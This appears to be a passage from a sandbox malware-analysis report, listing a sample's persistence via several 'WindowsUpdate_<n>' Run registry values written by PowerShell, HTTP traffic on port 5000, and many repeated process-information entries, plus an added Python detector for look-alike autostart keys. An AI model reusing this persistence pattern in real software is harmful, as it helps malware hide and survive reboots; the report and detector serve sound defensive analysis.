Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_542
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_802
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_387
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_540
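The Run values above share one stem, WindowsUpdate_, with a varying numeric tail, and all of them are written by powershell.exe under HKEY_CURRENT_USER. That pattern (one image registering several look-alike autostart entries) is what the "Creates multiple autostart registry keys" signature keys on. The Python below is an added example of that detection logic, not code from Joe Sandbox or from the sample: it groups Run-value writes by image and by name stem and flags an image that registers at least three numbered variants. The registry-set events and their image|key\value layout are constructed for the example and do not represent a real Sysmon export.

```python
"""Flag a process that writes several look-alike autostart values.

Added example for this report, not code from Joe Sandbox or the sample.  The
event lines are constructed to mirror the Run values listed above; the
'image|key\\value' layout is an assumption, not a real Sysmon export format.
"""
import re
from collections import defaultdict
from typing import Dict, Iterator, List, Tuple

# A value set under a per-user or machine Run key; the value name is captured.
RUN_VALUE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\(?P<name>[^\\\s]+)$",
    re.IGNORECASE,
)
# Split 'WindowsUpdate_589' into stem 'WindowsUpdate_' and its numeric tail.
NUMBERED = re.compile(r"^(?P<stem>.+?)(?P<num>\d+)$")

# Constructed registry-set events: the six names from the report (one of them
# written twice, as in the report) plus two benign writers the detector must ignore.
EVENTS = r"""
powershell.exe|HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate_589
powershell.exe|HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate_542
powershell.exe|HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate_802
powershell.exe|HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate_60
powershell.exe|HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate_387
powershell.exe|HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate_540
powershell.exe|HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate_542
explorer.exe|HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive
msiexec.exe|HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VMwareTools
"""


def parse_events(text: str) -> Iterator[Tuple[str, str]]:
    """Yield (image, value_name) for every line that targets a Run key."""
    for line in text.splitlines():
        if not line.strip():
            continue
        image, _, target = line.partition("|")
        m = RUN_VALUE.search(target)
        if m:
            yield image, m.group("name")


def find_autostart_clusters(text: str, min_values: int = 3) -> Dict[str, Dict[str, List[str]]]:
    """Return {image: {stem: sorted names}} for every image that wrote at least
    min_values distinct Run values sharing one name stem (same text, varying number)."""
    per_image: Dict[str, Dict[str, set]] = defaultdict(lambda: defaultdict(set))
    for image, name in parse_events(text):
        m = NUMBERED.match(name)
        stem = m.group("stem") if m else name
        per_image[image][stem].add(name)
    clusters: Dict[str, Dict[str, List[str]]] = {}
    for image, stems in per_image.items():
        flagged = {s: sorted(n) for s, n in stems.items() if len(n) >= min_values}
        if flagged:
            clusters[image] = flagged
    return clusters


if __name__ == "__main__":
    for image, stems in find_autostart_clusters(EVENTS).items():
        for stem, names in stems.items():
            print(f"{image}: {len(names)} Run values matching {stem}<n>: {', '.join(names)}")
```

Counting distinct names rather than write events keeps a legitimate installer that rewrites one value several times below the threshold, while the six WindowsUpdate_<n> variants from this report trip it on the first pass.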

                  Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49708
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
